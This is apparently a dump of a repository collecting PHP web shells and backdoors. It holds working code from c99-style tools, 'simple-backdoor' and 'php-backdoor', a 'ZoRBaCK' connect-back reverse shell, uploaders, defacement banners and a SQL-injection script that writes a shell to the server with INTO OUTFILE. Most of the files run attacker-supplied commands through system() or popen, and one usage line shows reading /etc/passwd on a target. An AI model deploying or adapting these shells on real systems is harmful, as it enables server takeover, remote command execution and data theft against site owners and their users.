    "; 37 | 38 | print ""; 39 | print ""; 40 | 41 | print ""; 42 | print ""; 43 | 44 | print ""; 45 | print ""; 46 | 47 | print "
    Execute command:
    Change directory:
    Upload file:


    "; 48 | 49 | $currentCMD = str_replace("\\\"","\"",$currentCMD); 50 | $currentCMD = str_replace("\\\'","\'",$currentCMD); 51 | 52 | if( $_POST['_act'] == "Upload!" ) { 53 | if( $_FILES['_upl']['error'] != UPLOAD_ERR_OK ) { 54 | print "
    Error while uploading file!
    "; 55 | } else { 56 | print "
    ";
    57 |         system("mv ".$_FILES['_upl']['tmp_name']." ".$currentWD."/".$_FILES['_upl']['name']." 2>&1");
    58 |         print "
    File uploaded successfully!
    "; 59 | } 60 | } else { 61 | print "\n\n\n
    \n";
    62 |     $currentCMD = "cd ".$currentWD.";".$currentCMD;
    63 |     system($currentCMD);
    64 |     print "\n
    \n\n\n

    Command completed
    "; 65 | } 66 | 67 | exit; 68 | 69 | ?> 70 | -------------------------------------------------------------------------------- /PHP/.svn/text-base/Worse Linux Shell.txt.svn-base: -------------------------------------------------------------------------------- 1 | body{font-family:trebuchet ms;font-size:16px;}hr{width:100%;height:2px;}"; 6 | print "

    #worst @dal.net

    "; 7 | print "

    You have been hack By Shany with Love To #worst.

    "; 8 | print "

    Watch Your system Shany was here.

    "; 9 | print "

    Linux Shells

    "; 10 | print "

    "; 11 | 12 | $currentWD = str_replace("\\\\","\\",$_POST['_cwd']); 13 | $currentCMD = str_replace("\\\\","\\",$_POST['_cmd']); 14 | 15 | $UName = `uname -a`; 16 | $SCWD = `pwd`; 17 | $UserID = `id`; 18 | 19 | if( $currentWD == "" ) { 20 | $currentWD = $SCWD; 21 | } 22 | 23 | print ""; 24 | print ""; 25 | print ""; 26 | print ""; 27 | print ""; 28 | print "
    We are:".$_SERVER['REMOTE_HOST']." (".$_SERVER['REMOTE_ADDR'].")
    Server is:".$_SERVER['SERVER_SIGNATURE']."
    System type:$UName
    Our permissions:$UserID
    "; 29 | 30 | print "

    "; 31 | 32 | if( $_POST['_act'] == "List files!" ) { 33 | $currentCMD = "ls -la"; 34 | } 35 | 36 | print "
    "; 37 | 38 | print ""; 39 | print ""; 40 | 41 | print ""; 42 | print ""; 43 | 44 | print ""; 45 | print ""; 46 | 47 | print "
    Execute command:
    Change directory:
    Upload file:


    "; 48 | 49 | $currentCMD = str_replace("\\\"","\"",$currentCMD); 50 | $currentCMD = str_replace("\\\'","\'",$currentCMD); 51 | 52 | if( $_POST['_act'] == "Upload!" ) { 53 | if( $_FILES['_upl']['error'] != UPLOAD_ERR_OK ) { 54 | print "
    Error while uploading file!
    "; 55 | } else { 56 | print "
    ";
    57 |         system("mv ".$_FILES['_upl']['tmp_name']." ".$currentWD."/".$_FILES['_upl']['name']." 2>&1");
    58 |         print "
    File uploaded successfully!
    "; 59 | } 60 | } else { 61 | print "\n\n\n
    \n";
    62 |     $currentCMD = "cd ".$currentWD.";".$currentCMD;
    63 |     system($currentCMD);
    64 |     print "\n
    \n\n\n

    Command completed
    "; 65 | } 66 | 67 | exit; 68 | 69 | ?> 70 | -------------------------------------------------------------------------------- /PHP/.svn/text-base/aZRaiLPhp v1.0.php.svn-base: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Snifer/L4bsForShell/d319c03b7c46720fcc648c762170f99bf1c103a7/PHP/.svn/text-base/aZRaiLPhp v1.0.php.svn-base -------------------------------------------------------------------------------- /PHP/.svn/text-base/aZRaiLPhp v1.0.txt.svn-base: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Snifer/L4bsForShell/d319c03b7c46720fcc648c762170f99bf1c103a7/PHP/.svn/text-base/aZRaiLPhp v1.0.txt.svn-base -------------------------------------------------------------------------------- /PHP/.svn/text-base/accept_language.txt.svn-base: -------------------------------------------------------------------------------- 1 | by q1w2e3r4'; ?> 2 | -------------------------------------------------------------------------------- /PHP/.svn/text-base/antichat.php.svn-base: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Snifer/L4bsForShell/d319c03b7c46720fcc648c762170f99bf1c103a7/PHP/.svn/text-base/antichat.php.svn-base -------------------------------------------------------------------------------- /PHP/.svn/text-base/arabicspy.php.svn-base: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Snifer/L4bsForShell/d319c03b7c46720fcc648c762170f99bf1c103a7/PHP/.svn/text-base/arabicspy.php.svn-base -------------------------------------------------------------------------------- /PHP/.svn/text-base/b374k.v1.txt.svn-base: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Snifer/L4bsForShell/d319c03b7c46720fcc648c762170f99bf1c103a7/PHP/.svn/text-base/b374k.v1.txt.svn-base -------------------------------------------------------------------------------- /PHP/.svn/text-base/bdotw44shell.txt.svn-base: -------------------------------------------------------------------------------- 1 | \n"); 9 | define("ln","\n"); 10 | global $formcmd; 11 | if(!empty($_POST["cmd"])) { 12 | $formcmd = $_POST["cmd"]; 13 | } 14 | function wr($txt){echo $txt;} 15 | function com($txt){wr("xplo@sexec~$ ".$txt);} 16 | function root($txt){wr("xplo@sexec~# ".$txt);} 17 | function funcex($func,$txt="Using: "){com($txt.$func.ln);return $var = function_exists($func);} 18 | //styling 19 | echo ''.ln; 20 | echo '
    '.ln; 21 | echo ''.ln; 124 | echo ''.ln; 127 | echo ''.br; 128 | echo ''.ln; 129 | ?> 130 | -------------------------------------------------------------------------------- /PHP/.svn/text-base/bug (1).php.svn-base: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /PHP/.svn/text-base/bug.php.svn-base: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /PHP/.svn/text-base/c100.txt.svn-base: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Snifer/L4bsForShell/d319c03b7c46720fcc648c762170f99bf1c103a7/PHP/.svn/text-base/c100.txt.svn-base -------------------------------------------------------------------------------- /PHP/.svn/text-base/c66.php.svn-base: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Snifer/L4bsForShell/d319c03b7c46720fcc648c762170f99bf1c103a7/PHP/.svn/text-base/c66.php.svn-base -------------------------------------------------------------------------------- /PHP/.svn/text-base/c99.php.svn-base: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Snifer/L4bsForShell/d319c03b7c46720fcc648c762170f99bf1c103a7/PHP/.svn/text-base/c99.php.svn-base -------------------------------------------------------------------------------- /PHP/.svn/text-base/c99.txt.svn-base: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Snifer/L4bsForShell/d319c03b7c46720fcc648c762170f99bf1c103a7/PHP/.svn/text-base/c99.txt.svn-base -------------------------------------------------------------------------------- /PHP/.svn/text-base/c993.txt.svn-base: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Snifer/L4bsForShell/d319c03b7c46720fcc648c762170f99bf1c103a7/PHP/.svn/text-base/c993.txt.svn-base -------------------------------------------------------------------------------- /PHP/.svn/text-base/c99_PSych0.php.svn-base: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Snifer/L4bsForShell/d319c03b7c46720fcc648c762170f99bf1c103a7/PHP/.svn/text-base/c99_PSych0.php.svn-base -------------------------------------------------------------------------------- /PHP/.svn/text-base/c99shell.php.svn-base: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Snifer/L4bsForShell/d319c03b7c46720fcc648c762170f99bf1c103a7/PHP/.svn/text-base/c99shell.php.svn-base -------------------------------------------------------------------------------- /PHP/.svn/text-base/c99v2.php.svn-base: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Snifer/L4bsForShell/d319c03b7c46720fcc648c762170f99bf1c103a7/PHP/.svn/text-base/c99v2.php.svn-base -------------------------------------------------------------------------------- /PHP/.svn/text-base/cmd.php.svn-base: -------------------------------------------------------------------------------- 1 | 11 | 12 | 13 | 14 | 15 |
    16 |
    17 | 
    22 | 
    23 | 24 | 25 | 26 | -------------------------------------------------------------------------------- /PHP/.svn/text-base/cmd.txt.svn-base: -------------------------------------------------------------------------------- 1 |
    -------------------------------------------------------------------------------- /PHP/.svn/text-base/connect-back.php.txt.svn-base: -------------------------------------------------------------------------------- 1 | ZoRBaCK Connect' ); 16 | 17 | echo "
    ZoRBaCK Connect
    18 | Usage: nc -vv -l -p 21
    19 |
    20 |

    21 | Your IP & Port:
    22 | 23 |

    24 |

    25 |
    26 |
    "; 27 | 28 | $ipim=$_POST['ipim']; 29 | $portum=$_POST['portum']; 30 | if ($ipim <> "") 31 | { 32 | $mucx=fsockopen($ipim , $portum , $errno, $errstr ); 33 | if (!$mucx){ 34 | $result = "Error: didnt connect !!!"; 35 | } 36 | else { 37 | 38 | $zamazing0="\n"; 39 | 40 | fputs ($mucx ,"\nwelcome ZoRBaCK\n\n"); 41 | fputs($mucx , system("uname -a") .$zamazing0 ); 42 | fputs($mucx , system("pwd") .$zamazing0 ); 43 | fputs($mucx , system("id") .$zamazing0.$zamazing0 ); 44 | while(!feof($mucx)){ 45 | fputs ($mucx); 46 | $one="[$"; 47 | $two="]"; 48 | $result= fgets ($mucx, 8192); 49 | $message=`$result`; 50 | fputs ($mucx, $one. system("whoami") .$two. " " .$message."\n"); 51 | } 52 | fclose ($mucx); 53 | } 54 | } 55 | 56 | ?> -------------------------------------------------------------------------------- /PHP/.svn/text-base/ctt_sh.txt.svn-base: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Snifer/L4bsForShell/d319c03b7c46720fcc648c762170f99bf1c103a7/PHP/.svn/text-base/ctt_sh.txt.svn-base -------------------------------------------------------------------------------- /PHP/.svn/text-base/cybershell.txt.svn-base: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Snifer/L4bsForShell/d319c03b7c46720fcc648c762170f99bf1c103a7/PHP/.svn/text-base/cybershell.txt.svn-base -------------------------------------------------------------------------------- /PHP/.svn/text-base/egy.txt.svn-base: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Snifer/L4bsForShell/d319c03b7c46720fcc648c762170f99bf1c103a7/PHP/.svn/text-base/egy.txt.svn-base -------------------------------------------------------------------------------- /PHP/.svn/text-base/erne.txt.svn-base: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Snifer/L4bsForShell/d319c03b7c46720fcc648c762170f99bf1c103a7/PHP/.svn/text-base/erne.txt.svn-base -------------------------------------------------------------------------------- /PHP/.svn/text-base/ex0shell.txt.svn-base: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Snifer/L4bsForShell/d319c03b7c46720fcc648c762170f99bf1c103a7/PHP/.svn/text-base/ex0shell.txt.svn-base -------------------------------------------------------------------------------- /PHP/.svn/text-base/gfs_sh.txt.svn-base: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Snifer/L4bsForShell/d319c03b7c46720fcc648c762170f99bf1c103a7/PHP/.svn/text-base/gfs_sh.txt.svn-base -------------------------------------------------------------------------------- /PHP/.svn/text-base/h4ntu shell [powered by tsoi].php.svn-base: -------------------------------------------------------------------------------- 1 | h4ntu shell [powered by tsoi] 2 | This Is The Server Information

    "; 4 | ?> 5 | 6 | 16 | 17 |
    18 | 19 | 23 | 24 | 25 | 26 | 29 | 30 | 31 | 32 | 33 | 34 | 35 | 36 | 37 | 38 | 39 | 40 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | 48 | 49 | 50 | 51 | 52 | 53 | 54 |
    :
    User Info: uid=() euid=() gid=()
    Current Path:
    Permission Directory:
    Server Services:
    Server Adress:
    Script Current User:
    PHP Version:
    55 |
    56 | 57 | #php injection:
    58 |
    "> 59 | cmd : 60 | 61 |
    62 | 63 |
    64 | 65 |
    66 | 67 |
    68 |  /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp");
    73 |   $output = ob_get_contents();
    74 |   ob_end_clean();
    75 |   if (!empty($output)) echo str_replace(">", ">", str_replace("<", "<", $output));
    76 | exit;
    77 | ?>
    78 | 
    79 | -------------------------------------------------------------------------------- /PHP/.svn/text-base/h4ntu shell [powered by tsoi].txt.svn-base: -------------------------------------------------------------------------------- 1 | h4ntu shell [powered by tsoi] 2 | This Is The Server Information

    "; 4 | ?> 5 | 6 | 16 | 17 |
    18 | 19 | 23 | 24 | 25 | 26 | 29 | 30 | 31 | 32 | 33 | 34 | 35 | 36 | 37 | 38 | 39 | 40 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | 48 | 49 | 50 | 51 | 52 | 53 | 54 |
    :
    User Info: uid=() euid=() gid=()
    Current Path:
    Permission Directory:
    Server Services:
    Server Adress:
    Script Current User:
    PHP Version:
    55 |
    56 | 57 | #php injection:
    58 |
    "> 59 | cmd : 60 | 61 |
    62 | 63 |
    64 | 65 |
    66 | 67 |
    68 |  /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp");
    73 |   $output = ob_get_contents();
    74 |   ob_end_clean();
    75 |   if (!empty($output)) echo str_replace(">", ">", str_replace("<", "<", $output));
    76 | exit;
    77 | ?>
    78 | 
    79 | -------------------------------------------------------------------------------- /PHP/.svn/text-base/iMHaPFtp.txt.svn-base: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Snifer/L4bsForShell/d319c03b7c46720fcc648c762170f99bf1c103a7/PHP/.svn/text-base/iMHaPFtp.txt.svn-base -------------------------------------------------------------------------------- /PHP/.svn/text-base/kral.txt.svn-base: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Snifer/L4bsForShell/d319c03b7c46720fcc648c762170f99bf1c103a7/PHP/.svn/text-base/kral.txt.svn-base -------------------------------------------------------------------------------- /PHP/.svn/text-base/lamashell.txt.svn-base: -------------------------------------------------------------------------------- 1 | 18 | 20 | 21 | 22 | lama's'hell v. 3.0 23 | 30 | 31 | 32 |
    33 |                               _           _
    34 |                              / \_______ /|_\
    35 |                             /          /_/ \__
    36 |                            /             \_/ /
    37 |                          _|_              |/|_
    38 |                          _|_  O    _    O  _|_
    39 |                          _|_      (_)      _|_
    40 |                           \                 /
    41 |                            _\_____________/_
    42 |                           /  \/  (___)  \/  \
    43 |                           \__(  o     o  )__/ 
    58 | 
    59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 |
    Execute command:
    Change directory:
    Upload file:
    67 |

    68 |
    "; 72 | } else { 73 | echo "There was an error uploading the file, please try again!"; 74 | } 75 | } 76 | if(($_POST['exe']) == "Execute") { 77 | $curcmd = "cd ".$curdir.";".$curcmd; 78 | $f=popen($curcmd,"r"); 79 | while (!feof($f)) { 80 | $buffer = fgets($f, 4096); 81 | $string .= $buffer; 82 | } 83 | pclose($f); 84 | echo htmlspecialchars($string); 85 | } 86 | ?> 87 |
    88 | 89 | 90 | -------------------------------------------------------------------------------- /PHP/.svn/text-base/list.php.svn-base: -------------------------------------------------------------------------------- 1 | 11 | 12 | " . $filename . "
    "; 23 | } 24 | closedir($handle); 25 | } else { 26 | echo "FILE: " . $fichero . "

    ";
    27 |   $fp = fopen($fichero, "r");
    28 |   $buffer = fread($fp, filesize($fichero));
    29 |   echo $buffer;
    30 |   fclose($fp);
    31 |   }
    32 | 
    33 | ?>
    
    
    --------------------------------------------------------------------------------
    /PHP/.svn/text-base/load_shell.txt.svn-base:
    --------------------------------------------------------------------------------
    https://raw.githubusercontent.com/Snifer/L4bsForShell/d319c03b7c46720fcc648c762170f99bf1c103a7/PHP/.svn/text-base/load_shell.txt.svn-base
    
    
    --------------------------------------------------------------------------------
    /PHP/.svn/text-base/matamu.txt.svn-base:
    --------------------------------------------------------------------------------
      1 | 
      6 | 
      7 | 
      8 | 
      9 |  Matamu Mat 
     10 | 
     11 | 
     12 | 

    13 | 14 | 56 | 57 |
    58 |

    Current working directory: 59 | Root/'; 64 | 65 | if (!empty($work_dir_splitted[0])) { 66 | $path = ''; 67 | for ($i = 0; $i < count($work_dir_splitted); $i++) { 68 | $path .= '/' . $work_dir_splitted[$i]; 69 | printf('%s/', 70 | $PHP_SELF, urlencode($path), $work_dir_splitted[$i]); 71 | } 72 | } 73 | 74 | ?>

    75 |

    Choose new working directory: 76 |

    115 | 116 |

    Command: 117 |

    118 | 119 |

    Enable stderr-trapping?

    120 | 137 |
    138 | 139 | 142 | 143 |
    144 | 145 | 146 | 147 | -------------------------------------------------------------------------------- /PHP/.svn/text-base/myshell.txt.svn-base: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Snifer/L4bsForShell/d319c03b7c46720fcc648c762170f99bf1c103a7/PHP/.svn/text-base/myshell.txt.svn-base -------------------------------------------------------------------------------- /PHP/.svn/text-base/mysql.txt.svn-base: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Snifer/L4bsForShell/d319c03b7c46720fcc648c762170f99bf1c103a7/PHP/.svn/text-base/mysql.txt.svn-base -------------------------------------------------------------------------------- /PHP/.svn/text-base/nshell.txt.svn-base: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Snifer/L4bsForShell/d319c03b7c46720fcc648c762170f99bf1c103a7/PHP/.svn/text-base/nshell.txt.svn-base -------------------------------------------------------------------------------- /PHP/.svn/text-base/nst.txt.svn-base: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Snifer/L4bsForShell/d319c03b7c46720fcc648c762170f99bf1c103a7/PHP/.svn/text-base/nst.txt.svn-base -------------------------------------------------------------------------------- /PHP/.svn/text-base/nstview.txt.svn-base: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Snifer/L4bsForShell/d319c03b7c46720fcc648c762170f99bf1c103a7/PHP/.svn/text-base/nstview.txt.svn-base -------------------------------------------------------------------------------- /PHP/.svn/text-base/pHpINJ.txt.svn-base: -------------------------------------------------------------------------------- 1 | 3 | 4 | 5 | || .::News Remote PHP Shell Injection::. || 6 | 7 | 8 |
    || .::News PHP Shell Injection::. ||


    9 | ' ,0 ,0 ,0 ,0 INTO OUTFILE '$outfile"; 15 | $sql = urlencode($sql); 16 | $expurl= $url."?id=".$sql ; 17 | echo ' Click Here to Exploit
    '; 18 | echo "After clicking go to http://www.site.com/path2phpshell/shell.php?cpc=ls to see results"; 19 | } 20 | else 21 | { 22 | ?> 23 | Url to index.php:
    24 |
    " method = "post"> 25 |
    26 | Server Path to Shell:
    27 | Full server path to a writable file which will contain the Php Shell
    28 |

    29 |

    30 | 31 | 32 | 33 | 36 | 37 | -------------------------------------------------------------------------------- /PHP/.svn/text-base/php-backdoor.txt.svn-base: -------------------------------------------------------------------------------- 1 | "; 14 | if ($handle = opendir("$d")) { 15 | echo "

    listing of $d

    "; 16 | while ($dir = readdir($handle)){ 17 | if (is_dir("$d/$dir")) echo ""; 18 | else echo ""; 19 | echo "$dir\n"; 20 | echo ""; 21 | } 22 | 23 | } else echo "opendir() failed"; 24 | closedir($handle); 25 | die ("
    "); 26 | } 27 | if(isset($_REQUEST['c'])){ 28 | echo "
    ";
    29 | 	system($_REQUEST['c']);		   
    30 | 	die;
    31 | }
    32 | if(isset($_REQUEST['upload'])){
    33 | 
    34 | 		if(!isset($_REQUEST['dir'])) die('hey,specify directory!');
    35 | 			else $dir=$_REQUEST['dir'];
    36 | 		$fname=$HTTP_POST_FILES['file_name']['name'];
    37 | 		if(!move_uploaded_file($HTTP_POST_FILES['file_name']['tmp_name'], $dir.$fname))
    38 | 			die('file uploading error.');
    39 | }
    40 | if(isset($_REQUEST['mquery'])){
    41 | 	
    42 | 	$host=$_REQUEST['host'];
    43 | 	$usr=$_REQUEST['usr'];
    44 | 	$passwd=$_REQUEST['passwd'];
    45 | 	$db=$_REQUEST['db'];
    46 | 	$mquery=$_REQUEST['mquery'];
    47 | 	mysql_connect("$host", "$usr", "$passwd") or
    48 |     die("Could not connect: " . mysql_error());
    49 |     mysql_select_db("$db");
    50 |     $result = mysql_query("$mquery");
    51 | 	if($result!=FALSE) echo "

    query was executed correctly

    \n"; 52 | while ($row = mysql_fetch_array($result,MYSQL_ASSOC)) print_r($row); 53 | mysql_free_result($result); 54 | die; 55 | } 56 | ?> 57 |
    execute command: 
    58 |
    59 | upload file: to dir:   
    60 |
    to browse go to http://?d=[directory here] 61 |
    for example: 62 | http://?d=/etc on *nix 63 | or http://?d=c:/windows on win 64 |
    execute mysql query: 65 |
    66 | host: user: password: 67 | 68 | database: query: 69 |
    70 | 71 | 72 | -------------------------------------------------------------------------------- /PHP/.svn/text-base/priv8-2012-bypass-shell.txt.svn-base: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Snifer/L4bsForShell/d319c03b7c46720fcc648c762170f99bf1c103a7/PHP/.svn/text-base/priv8-2012-bypass-shell.txt.svn-base -------------------------------------------------------------------------------- /PHP/.svn/text-base/pws.txt.svn-base: -------------------------------------------------------------------------------- 1 | 2 | 3 |
    Input command :
    4 |
    5 |
    6 |
     7 | 
    13 | 
    14 |
    15 |
    Uploader file :
    16 | 17 |
    27 | 28 | "> 29 | 30 | 31 | 32 | 33 | 34 | 35 | 36 | -------------------------------------------------------------------------------- /PHP/.svn/text-base/r57shell1.40.txt.svn-base: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Snifer/L4bsForShell/d319c03b7c46720fcc648c762170f99bf1c103a7/PHP/.svn/text-base/r57shell1.40.txt.svn-base -------------------------------------------------------------------------------- /PHP/.svn/text-base/remview_fix.php.svn-base: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Snifer/L4bsForShell/d319c03b7c46720fcc648c762170f99bf1c103a7/PHP/.svn/text-base/remview_fix.php.svn-base -------------------------------------------------------------------------------- /PHP/.svn/text-base/rootshell.txt.svn-base: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Snifer/L4bsForShell/d319c03b7c46720fcc648c762170f99bf1c103a7/PHP/.svn/text-base/rootshell.txt.svn-base -------------------------------------------------------------------------------- /PHP/.svn/text-base/ru24_post_sh.txt.svn-base: -------------------------------------------------------------------------------- 1 | 11 | 12 | Ru24PostWebShell - ".$_POST['cmd']." 13 | 14 | "; 15 | echo ""; 16 | echo ""; 17 | echo ""; 18 | echo "
    ";
    19 | if ((!$_POST['cmd']) || ($_POST['cmd']=="")) { $_POST['cmd']="id;pwd;uname -a;ls -la"; }
    20 | echo "".$function($_POST['cmd'])."
    "; 21 | 22 | 23 | ?> 24 | -------------------------------------------------------------------------------- /PHP/.svn/text-base/s72 Shell v1.1 Coding.php.svn-base: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Snifer/L4bsForShell/d319c03b7c46720fcc648c762170f99bf1c103a7/PHP/.svn/text-base/s72 Shell v1.1 Coding.php.svn-base -------------------------------------------------------------------------------- /PHP/.svn/text-base/s72 Shell v1.1 Coding.txt.svn-base: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Snifer/L4bsForShell/d319c03b7c46720fcc648c762170f99bf1c103a7/PHP/.svn/text-base/s72 Shell v1.1 Coding.txt.svn-base -------------------------------------------------------------------------------- /PHP/.svn/text-base/safe0ver.txt.svn-base: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Snifer/L4bsForShell/d319c03b7c46720fcc648c762170f99bf1c103a7/PHP/.svn/text-base/safe0ver.txt.svn-base -------------------------------------------------------------------------------- /PHP/.svn/text-base/simple-backdoor.txt.svn-base: -------------------------------------------------------------------------------- 1 | 2 | 3 | "; 7 | $cmd = ($_REQUEST['cmd']); 8 | system($cmd); 9 | echo "
    "; 10 | die; 11 | } 12 | 13 | ?> 14 | 15 | Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd 16 | 17 | 18 | -------------------------------------------------------------------------------- /PHP/.svn/text-base/simple_cmd.txt.svn-base: -------------------------------------------------------------------------------- 1 | 2 | 3 | G-Security Webshell 4 | 5 | 6 | 7 |
    8 |
    9 | 11 |
    12 |
    13 | 
    14 | 
    15 | 
    16 |
    17 | 18 | 11 | 12 | 13 | 14 |
    15 | 16 |

    Local File: 17 |

    Remote File: 18 | 19 |




    20 | 21 | 31 | 32 | 33 | 34 | -------------------------------------------------------------------------------- /PHP/.svn/text-base/uploader.txt.svn-base: -------------------------------------------------------------------------------- 1 |
    2 | 3 | Send this file: 4 | 5 |
    6 | 9 | -------------------------------------------------------------------------------- /PHP/2mv2.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Snifer/L4bsForShell/d319c03b7c46720fcc648c762170f99bf1c103a7/PHP/2mv2.txt -------------------------------------------------------------------------------- /PHP/Ayyildiz Tim -AYT- Shell v 2.1 Biz.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Snifer/L4bsForShell/d319c03b7c46720fcc648c762170f99bf1c103a7/PHP/Ayyildiz Tim -AYT- Shell v 2.1 Biz.txt -------------------------------------------------------------------------------- /PHP/Crystal.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Snifer/L4bsForShell/d319c03b7c46720fcc648c762170f99bf1c103a7/PHP/Crystal.txt -------------------------------------------------------------------------------- /PHP/CrystalShell v.1.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Snifer/L4bsForShell/d319c03b7c46720fcc648c762170f99bf1c103a7/PHP/CrystalShell v.1.txt -------------------------------------------------------------------------------- /PHP/Cyber Shell (v 1.0).php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Snifer/L4bsForShell/d319c03b7c46720fcc648c762170f99bf1c103a7/PHP/Cyber Shell (v 1.0).php -------------------------------------------------------------------------------- /PHP/Dx.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Snifer/L4bsForShell/d319c03b7c46720fcc648c762170f99bf1c103a7/PHP/Dx.txt -------------------------------------------------------------------------------- /PHP/DxShell.1.0.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Snifer/L4bsForShell/d319c03b7c46720fcc648c762170f99bf1c103a7/PHP/DxShell.1.0.txt -------------------------------------------------------------------------------- /PHP/FaTaLisTiCz_Fx.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Snifer/L4bsForShell/d319c03b7c46720fcc648c762170f99bf1c103a7/PHP/FaTaLisTiCz_Fx.txt -------------------------------------------------------------------------------- /PHP/Fx29Sh.3.2.12.08.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Snifer/L4bsForShell/d319c03b7c46720fcc648c762170f99bf1c103a7/PHP/Fx29Sh.3.2.12.08.txt -------------------------------------------------------------------------------- /PHP/G5.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Snifer/L4bsForShell/d319c03b7c46720fcc648c762170f99bf1c103a7/PHP/G5.php -------------------------------------------------------------------------------- /PHP/GFS web-shell ver 3.1.7 - PRiV8.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Snifer/L4bsForShell/d319c03b7c46720fcc648c762170f99bf1c103a7/PHP/GFS web-shell ver 3.1.7 - PRiV8.txt -------------------------------------------------------------------------------- /PHP/KAdot Universal Shell v0.1.6.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Snifer/L4bsForShell/d319c03b7c46720fcc648c762170f99bf1c103a7/PHP/KAdot Universal Shell v0.1.6.php -------------------------------------------------------------------------------- /PHP/KAdot Universal Shell v0.1.6.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Snifer/L4bsForShell/d319c03b7c46720fcc648c762170f99bf1c103a7/PHP/KAdot Universal Shell v0.1.6.txt -------------------------------------------------------------------------------- /PHP/Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Snifer/L4bsForShell/d319c03b7c46720fcc648c762170f99bf1c103a7/PHP/Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.php -------------------------------------------------------------------------------- /PHP/Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Snifer/L4bsForShell/d319c03b7c46720fcc648c762170f99bf1c103a7/PHP/Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.txt -------------------------------------------------------------------------------- /PHP/NCC-Shell.txt: -------------------------------------------------------------------------------- 1 |
    2 |

    .:NCC:. Shell v1.0.0

    3 | .:NCC:. Shell v1.0.0 4 |

    Hacked by Silver

    5 |

    ---------------------------------------------------------------------------------------


    6 | ---Server Info---
    7 | Safe Mode on/off:
    "; 9 | // Check for safe mode 10 | if( ini_get('safe_mode') ) { 11 | print 'Safe Mode ON'; 12 | } else { 13 | print 'Safe Mode OFF'; 14 | } 15 | echo "
    "; 16 | echo "Momentane Directory: "; echo $_SERVER['DOCUMENT_ROOT']; 17 | echo "
    "; 18 | echo "Server:
    "; echo $_SERVER['SERVER_SIGNATURE']; 19 | echo "PHPinfo"; 20 | if(@$_GET['p']=="info"){ 21 | @phpinfo(); 22 | exit;} 23 | ?> 24 |

    ---------------------------------------------------------------------------


    25 |

    - Upload -

    26 | Upload - Shell/Datei 27 |
    31 | 32 | 33 |
    34 |
    35 | \n", 41 | $_FILES['probe']['name']); 42 | printf("Sie ist %u Bytes groß und vom Typ %s.
    \n", 43 | $_FILES['probe']['size'], $_FILES['probe']['type']); 44 | } 45 | ?> 46 |

    ---------------------------------------------------------------------------


    47 |

    IpLogger

    48 |
    IP:
    "; echo $_SERVER['REMOTE_ADDR']; 50 | echo "
    PORT:
    "; echo $_SERVER['REMOTE_PORT']; 51 | echo "
    BROWSER:
    "; echo $_SERVER[HTTP_REFERER]; 52 | echo "
    REFERER:
    "; echo $_SERVER['HTTP_USER_AGENT']; 53 | ?> 54 |

    ---------------------------------------------------------------------------


    55 |

    Directory Lister

    56 |

    >

    57 |

    ---------------------------------------------------------------------------


    58 | --Coded by Silver©--
    59 | ~|_Team .:National Cracker Crew:._|~
    60 | -->NCC<--
